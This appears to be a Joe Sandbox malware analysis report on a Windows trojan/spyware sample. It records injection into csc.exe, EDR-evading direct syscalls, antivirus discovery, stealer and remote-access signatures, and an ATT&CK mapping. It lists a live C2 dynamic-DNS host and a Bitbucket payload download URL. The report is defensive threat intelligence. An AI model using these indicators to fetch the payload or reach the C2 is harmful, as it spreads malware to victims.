HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5250000 protect: page execute and read and write

Contains functionality to prevent local Windows debugging

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_0045ECD0 EnterCriticalSection,IsDebuggerPresent,DebugBreak,GetLocalTime,CreateFileA,LeaveCriticalSection,SetFilePointer,GetCurrentThreadId,GetCurrentThreadId,WriteFile,WriteFile,WriteFile,CloseHandle,LeaveCriticalSection,		0_2_0045ECD0
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: 0_2_0045EED0 IsDebuggerPresent,DebugBreak,EnterCriticalSection,LeaveCriticalSection,		0_2_0045EED0

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtQuerySystemInformation: Direct from: 0x7FFB2CEA4B5E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtSetTimerEx: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtOpenKeyEx: Direct from: 0x7FFB2CECF3F4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtNotifyChangeKey: Direct from: 0x7FFB2CECF314	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtQueueApcThread: Direct from: 0x7FFB2CECD8A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtQueryAttributesFile: Direct from: 0x7FFB2CECD7A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtCreateFile: Direct from: 0x7FFB2CECDAA4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtQueryValueKey: Direct from: 0x7FFB2CECD2E4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtResumeThread: Direct from: 0x7FFB2CECDA44	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtClose: Direct from: 0x7FFB2CECD1E4
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtQueryVolumeInformationFile: Direct from: 0x7FFB2CECD924	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtCreateThreadEx: Direct from: 0x7FFB2CECE814	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtQuerySystemInformation: Direct from: 0x7FFB2CECD6C4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtCreateKey: Direct from: 0x7FFB2CECD3A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtOpenSection: Direct from: 0x7FFB2CECD6E4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtProtectVirtualMemory: Direct from: 0x7FFB2CECDA04	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtSetTimerEx: Direct from: 0x7FFB2CED05D4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtSetInformationThread: Direct from: 0x7FFB2CECD1A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtSetInformationFile: Direct from: 0x7FFB2CECD4E4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtQuerySystemInformation: Direct from: 0x777563E1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtSetValueKey: Direct from: 0x7FFB2CECDBF4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtEnumerateValueKey: Direct from: 0x7FFB2CECD264	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtSetInformationProcess: Direct from: 0x7FFB2CECD384	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtSetSecurityObject: Direct from: 0x7FFB2CED04D4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtMapViewOfSection: Direct from: 0x7FFB2CECD504	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtAllocateVirtualMemory: Direct from: 0x7FFB2CECD304	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtEnumerateKey: Direct from: 0x7FFB2CECD644	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtQueryInformationToken: Direct from: 0x7FFB2CECD424	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtUnmapViewOfSection: Direct from: 0x7FFB2CECD544	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtQueryInformationProcess: Direct from: 0x7FFB2CECD324	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtOpenFile: Direct from: 0x7FFB2CECD664	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtCreateMutant: Direct from: 0x7FFB2CECE654	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	NtOpenKey: Direct from: 0x7FFB2CECD244	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5250000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe	Memory written: C:\Users\user\AppData\Local\Temp\dzocgvabs.exe base: D0000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5250000			Jump to behavior
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E91008			Jump to behavior

Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D8F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program ManagerE
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D8F000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D99000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000003.2493856126.0000000009D88000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D8F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program Managerk
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D8F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D8F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program ManagerX
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D8F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program Managertdesk
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D99000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program ManagerO+h
Source: dzocgvabs.exe, 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager573ef1
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D8F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program Manager;9
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D8F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program Managerk9
Source: dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D7E000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: dzocgvabs.exe, 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2024/12/12 11:40:22 Program Manager]

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,		0_2_00412430
Source: C:\Users\user\Desktop\pPLwX9wSrD.exe	Code function: GetLocaleInfoA,		0_2_00490D7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_0045F0B0 EnterCriticalSection,GetCurrentThread,SetThreadPriority,CreateFileA,LeaveCriticalSection,SetFilePointer,GetLocalTime,GetCurrentThreadId,GetCurrentThreadId,GetCurrentProcess,GetCurrentProcess,CloseHandle,LeaveCriticalSection,

0_2_0045F0B0

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_0045E300 GetSystemTimeAsFileTime,GetModuleFileNameA,lstrcpyA,GetUserNameA,lstrcpyA,GetSystemInfo,GlobalMemoryStatus,

0_2_0045E300

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_00487BC0 _strlen,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_00487BC0

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_004830CF EntryPoint,GetVersionExA,GetModuleHandleA,

0_2_004830CF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dzocgvabs.exe PID: 7884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dzocgvabs.exe PID: 8076, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.dc80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.dzocgvabs.exe.5a60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dzocgvabs.exe PID: 7884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dzocgvabs.exe PID: 8076, type: MEMORYSTR

Source: C:\Users\user\Desktop\pPLwX9wSrD.exe

Code function: 0_2_00462680 socket,WSAGetLastError,htonl,htons,bind,WSAGetLastError,inet_addr,GetLastError,listen,WSAGetLastError,WSACreateEvent,WSAEventSelect,

0_2_00462680

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	111 Input Capture	2 System Time Discovery	Remote Services	12 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Scheduled Task/Job	12 Windows Service	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	111 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Service Execution	11 Scheduled Task/Job	12 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	136 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	11 Registry Run Keys / Startup Folder	42 Process Injection	2 Obfuscated Files or Information	NTDS	241 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Scheduled Task/Job	2 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	251 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	42 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pPLwX9wSrD.exe	39%	ReversingLabs	Win32.Ransomware.Generic

Source	Detection	Scanner	Label
http://www.geomind.co.kr/	0%	Avira URL Cloud	safe
https://bbuseruploads.s3.amazonaws	0%	Avira URL Cloud	safe
http://www.geomind.co.kr/Online	0%	Avira URL Cloud	safe
http://www.hdsentinel.com/sendreport.phpU	0%	Avira URL Cloud	safe
http://www.hdsentinel.com	0%	Avira URL Cloud	safe
newstaticfreepoint24.ddns-ip.net	0%	Avira URL Cloud	safe
http://www.hdsentinel.comU	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	54.231.193.17	true	false	high
bitbucket.org	185.166.143.50	true	false	high
navegacionseguracol24vip.org	181.131.217.244	true	false	high
geoplugin.net	178.237.33.50	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
newstaticfreepoint24.ddns-ip.net	181.131.217.244	true	true	unknown
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	false		high
https://bitbucket.org/facturacioncol/fact/downloads/null.exe	false		high
newstaticfreepoint24.ddns-ip.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bbuseruploads.s3.amazonaws.com	csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007769000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000076B1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpl	dzocgvabs.exe, 00000007.00000003.2493856126.0000000009D62000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D6D000.00000004.00000001.00020000.00000000.sdmp	false		high
http://bitbucket.org	csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpp	dzocgvabs.exe, 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web-security-reports.services.atlassian.com/csp-report/bb-website	csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.geomind.co.kr/	pPLwX9wSrD.exe	false	Avira URL Cloud: safe	unknown
http://www.hdsentinel.comU	csc.exe, 00000003.00000003.1794277108.0000000008E90000.00000004.00000800.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000002.2057015971.000000000F63E000.00000004.00001000.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000000.1792904857.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.4.dr	false	Avira URL Cloud: safe	unknown
http://www.indyproject.org/	HardDiskSentinelBin.exe.4.dr	false		high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/	csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dz8aopenkvv6s.cloudfront.net	csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.hdsentinel.com/sendreport.phpU	csc.exe, 00000003.00000003.1794277108.0000000008E90000.00000004.00000800.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000002.2057015971.000000000F63E000.00000004.00001000.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000000.1792904857.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.4.dr	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/	dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D88000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000003.2493856126.0000000009D88000.00000004.00000001.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	dzocgvabs.exe, 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpL	dzocgvabs.exe, 00000007.00000003.2493856126.0000000009D62000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D6D000.00000004.00000001.00020000.00000000.sdmp	false		high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	csc.exe, 00000003.00000002.3257799079.0000000009DC0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008B2E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1794277108.0000000008C65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws	csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.cookielaw.org/	csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.geomind.co.kr/Online	pPLwX9wSrD.exe	false	Avira URL Cloud: safe	unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;	csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aui-cdn.atlassian.com/	csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpR	dzocgvabs.exe, 00000007.00000002.3254552082.0000000009D99000.00000004.00000001.00020000.00000000.sdmp, dzocgvabs.exe, 00000007.00000003.2493856126.0000000009D88000.00000004.00000001.00020000.00000000.sdmp	false		high
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.3256041816.00000000079A9000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007765000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-	csc.exe, 00000003.00000002.3256041816.00000000079CA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.0000000007769000.00000004.00000800.00020000.00000000.sdmp	false		high
http://s3-w.us-east-1.amazonaws.com	csc.exe, 00000003.00000002.3256041816.00000000079E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	csc.exe, 00000003.00000002.3256041816.0000000007A55000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000076B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org	csc.exe, 00000003.00000002.3256041816.0000000007997000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3256041816.00000000076B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bbuseruploads.s3.amazonaws.com	csc.exe, 00000003.00000002.3256041816.00000000079E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.hdsentinel.com	csc.exe, 00000003.00000003.1794277108.0000000008E90000.00000004.00000800.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000002.2057015971.000000000F63E000.00000004.00001000.00020000.00000000.sdmp, dzocgvabs.exe, 00000004.00000000.1792904857.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.4.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
181.131.217.244	navegacionseguracol24vip.org	Colombia	13489	EPMTelecomunicacionesSAESPCO	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
185.166.143.50	bitbucket.org	Germany	16509	AMAZON-02US	false
54.231.193.17	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573894
Start date and time:	2024-12-12 17:37:55 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	pPLwX9wSrD.exe renamed because original name is a hash value
Original Sample Name:	8ee7bb70506574eb0ba1bffc0bafd993c707d01e54385ca83fb3f731521a9298.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@6/5@5/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 84% Number of executed functions: 23 Number of non-executed functions: 330
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 40.81.94.65, 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target dzocgvabs.exe, PID 8076 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
